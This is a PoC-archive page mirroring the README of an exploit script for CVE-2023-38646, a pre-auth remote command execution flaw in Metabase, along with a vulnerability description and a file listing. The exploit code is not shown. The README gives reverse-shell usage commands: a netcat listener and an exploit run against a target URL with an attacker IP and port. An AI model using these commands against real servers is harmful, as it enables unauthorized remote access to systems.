Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2023-38646 PoC — Metabase 安全漏洞

Source
https://github.com/nickswink/CVE-2023-38646
Associated Vulnerability
Title:Metabase 安全漏洞 (CVE-2023-38646)
Description:Metabase是美国Metabase公司的一个开源数据分析平台。 Metabase 0.46.6.1之前版本和Metabase Enterprise 1.46.6.1之前版本存在安全漏洞,该漏洞源于允许攻击者以运行该服务的权限在服务器上执行任意命令。
Description
CVE-2023-38646 Unauthenticated RCE vulnerability in Metabase
Readme
# CVE-2023-38646-exploit
"This vulnerability, designated as CVE-2023–38646, allowed attackers to execute arbitrary commands on the server without requiring any authentication."

A quick reverse shell exploit script for cve-2023-38646.
I did not find this vulnerability, just made the script.


## Usage

    root@box:~/CVE-2023-38646# python3 exploit.py
    
       _______      ________    ___   ___ ___  ____       ____   ___    __ _  _     __
    
    / ____\ \    / /  ____|  |__ \ / _ \__ \|___ \     |___ \ / _ \  / /| || |   / /
    | |     \ \  / /| |__ ______ ) | | | | ) | __) |_____ __) | (_) |/ /_| || |_ / /_
    | |      \ \/ / |  __|______/ /| | | |/ / |__ <______|__ < > _ <| '_ \__   _| '_ \
    | |____   \  /  | |____    / /_| |_| / /_ ___) |     ___) | (_) | (_) | | | | (_) |
    \_____|   \/   |______|  |____|\___/____|____/     |____/ \___/ \___/  |_|  \___/
    
    author: c0rnbread
    credits:
    https://blog.assetnote.io/2023/07/22/pre-auth-rce-metabase/
    https://raw.githubusercontent.com/kh4sh3i/CVE-2023-38646/main/CVE-2023-38646.py


    Usage: python3 exploit.py <url> <local-ip> <local-port>
Run using base url and local IP and port for reverse shell
      
    root@box:~/CVE-2023-38646# nc -lvnp 4444
    
    root@box:~/CVE-2023-38646# python3 exploit.py http://example.com 10.10.10.2 4444

![image](https://github.com/nickswink/CVE-2023-38646/assets/57839593/33a91801-684c-4021-a8d6-378c4ea39d45)

### Credits
https://blog.assetnote.io/2023/07/22/pre-auth-rce-metabase/

https://raw.githubusercontent.com/kh4sh3i/CVE-2023-38646/main/CVE-2023-38646.py
File Snapshot

 [4.0K]  /data/pocs/720c60725b0410d36771378fe02cfa9de77597d9
├── [2.9K]  exploit.py
└── [1.6K]  README.md

0 directories, 2 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.